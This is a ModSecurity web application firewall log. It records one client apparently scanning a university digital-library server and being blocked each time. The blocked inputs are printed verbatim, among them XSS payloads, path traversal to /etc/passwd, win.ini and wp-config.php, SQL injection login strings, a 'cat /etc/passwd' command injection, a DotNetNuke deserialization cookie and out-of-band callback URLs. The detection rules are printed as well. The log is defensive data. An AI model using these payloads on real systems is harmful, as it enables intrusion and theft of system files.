[Tue Aug 29 11:42:24.412173 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAcoNiYAAAAF"]
[Tue Aug 29 11:42:25.403993 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAcvBkoAAAAJ"]
[Tue Aug 29 11:42:26.380390 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAcoNigAAAAF"]
[Tue Aug 29 11:42:27.357073 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdTBAAAAAAY"]
[Tue Aug 29 11:42:27.383624 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdKXPAAAAAK"]
[Tue Aug 29 11:42:28.417003 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdTBAUAAAAY"]
[Tue Aug 29 11:42:29.691849 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAdOeRIAAAAS"]
[Tue Aug 29 11:42:32.413638 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "digilibfh.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAc@cYkAAAAL"]
[Tue Aug 29 11:42:32.438807 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gd5hkp8kux1yx5.oast.site found within TX:1: cjmnbitjmimt14dgn26gd5hkp8kux1yx5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdV7b4AAAAa"]
[Tue Aug 29 11:42:33.395587 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAdV7b8AAAAa"]
[Tue Aug 29 11:42:40.421866 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAcvBmIAAAAJ"]
[Tue Aug 29 11:42:40.432124 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAeX1AYAAAAK"]
[Tue Aug 29 11:42:41.454592 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeEDv4AAAAy"]
[Tue Aug 29 11:42:42.375984 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAQSW2QAAAA0"]
[Tue Aug 29 11:42:43.453761 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdXInwAAAAd"]
[Tue Aug 29 11:42:46.362680 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdlvckAAAAl"]
[Tue Aug 29 11:42:46.489396 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAARpg2IAAAAU"]
[Tue Aug 29 11:42:47.388831 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAdftTsAAAAG"]
[Tue Aug 29 11:42:47.418758 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAXNuXAAAAAg"]
[Tue Aug 29 11:42:48.444335 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdQ3h8AAAAV"]
[Tue Aug 29 11:42:48.489113 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26g5quj7a71gxmh8.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAc@cZ0AAAAL"]
[Tue Aug 29 11:42:48.510217 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdQ3iAAAAAV"]
[Tue Aug 29 11:42:50.431822 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdlvdIAAAAl"]
[Tue Aug 29 11:42:51.360005 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdTBB8AAAAY"]
[Tue Aug 29 11:42:51.366310 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAeB1pEAAAAv"]
[Tue Aug 29 11:42:52.372335 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAd-F0MAAAAt"]
[Tue Aug 29 11:42:53.380087 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAdUc3gAAAAZ"]
[Tue Aug 29 11:42:53.391814 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd9UNYAAAAr"]
[Tue Aug 29 11:42:54.467809 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAeYbzEAAAAB"]
[Tue Aug 29 11:42:54.471602 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAeX1CYAAAAK"]
